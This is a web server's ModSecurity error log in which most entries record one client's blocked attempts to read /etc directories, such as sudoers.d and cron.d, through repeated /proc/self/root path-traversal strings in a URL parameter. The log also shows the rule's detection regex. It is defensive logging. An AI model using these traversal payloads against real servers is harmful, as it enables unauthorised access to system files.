[Mon Mar 16 17:01:40.644860 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.241.46:47872] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhpLABkC4fWIHEf8EJeAAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:01:41.795679 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.241.46:47880] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhpf9ocpUE4ed4uDwH_wAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:01:43.115773 2026] [:error] [pid 29802:tid 140411716749056] [client 74.7.241.46:47884] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhp8_BxrYCr4hPDw__BAAAAcM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:01:50.989872 2026] [:error] [pid 14895:tid 140411590858496] [client 74.7.241.46:47892] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhrlajLEzk2WiQ-10oJgAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:01:54.519451 2026] [:error] [pid 21805:tid 140411548894976] [client 74.7.241.46:56936] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhsrABkC4fWIHEf8EJhwAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:01:57.045590 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.241.46:56950] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhtdSswJuvopo3lOh0fAAAAIw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:01:58.430330 2026] [:error] [pid 15061:tid 140411590858496] [client 74.7.241.46:59824] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhtqTCbgAP5jq5TehB5gAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:01:59.695338 2026] [:error] [pid 15568:tid 140411632822016] [client 74.7.241.46:59828] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhht6QpVkWug9HeOt9K6wAAA00"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:02:06.585528 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.241.46:59844] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhvdSswJuvopo3lOh0ggAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:02:08.996728 2026] [:error] [pid 14895:tid 140411733534464] [client 74.7.241.46:59846] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhwFajLEzk2WiQ-10oKwAAAoE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:02:10.339133 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.241.46:41018] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhwtSswJuvopo3lOh0hAAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:02:11.559787 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.241.46:41022] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhw_9ocpUE4ed4uDwIHwAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:02:19.751060 2026] [:error] [pid 29802:tid 140411557287680] [client 74.7.241.46:41032] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhy8_BxrYCr4hPDw__HQAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:02:21.116407 2026] [:error] [pid 14895:tid 140411582465792] [client 74.7.241.46:41002] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhzVajLEzk2WiQ-10oLwAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:02:22.419194 2026] [:error] [pid 14895:tid 140411674785536] [client 74.7.241.46:41016] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhhzlajLEzk2WiQ-10oMAAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:02:23.342549 2026] [access_compat:error] [pid 29802:tid 140411733534464] [client 45.94.31.197:51364] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 17:02:38.482012 2026] [:error] [pid 10772:tid 140411624429312] [client 74.7.241.46:41028] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhh3v9ocpUE4ed4uDwINQAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:02:41.585963 2026] [:error] [pid 29802:tid 140411599251200] [client 74.7.241.46:39210] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhh4c_BxrYCr4hPDw__IwAAAdE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:02:48.607204 2026] [:error] [pid 21806:tid 140411683178240] [client 74.7.241.46:39212] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhh6NSswJuvopo3lOh0lgAAAIc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:02:52.143340 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.241.46:49636] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhh7LABkC4fWIHEf8EJowAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:03:26.455491 2026] [:error] [pid 29802:tid 140411674785536] [client 74.7.241.46:49646] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhiDs_BxrYCr4hPDw__QwAAAcg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:04:39.691096 2026] [:error] [pid 15061:tid 140411658000128] [client 74.7.241.46:55660] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhiV6TCbgAP5jq5TehCQgAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:04:50.251710 2026] [:error] [pid 21805:tid 140411741927168] [client 74.7.244.31:35018] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhiYrABkC4fWIHEf8EKEQAAAEA"]
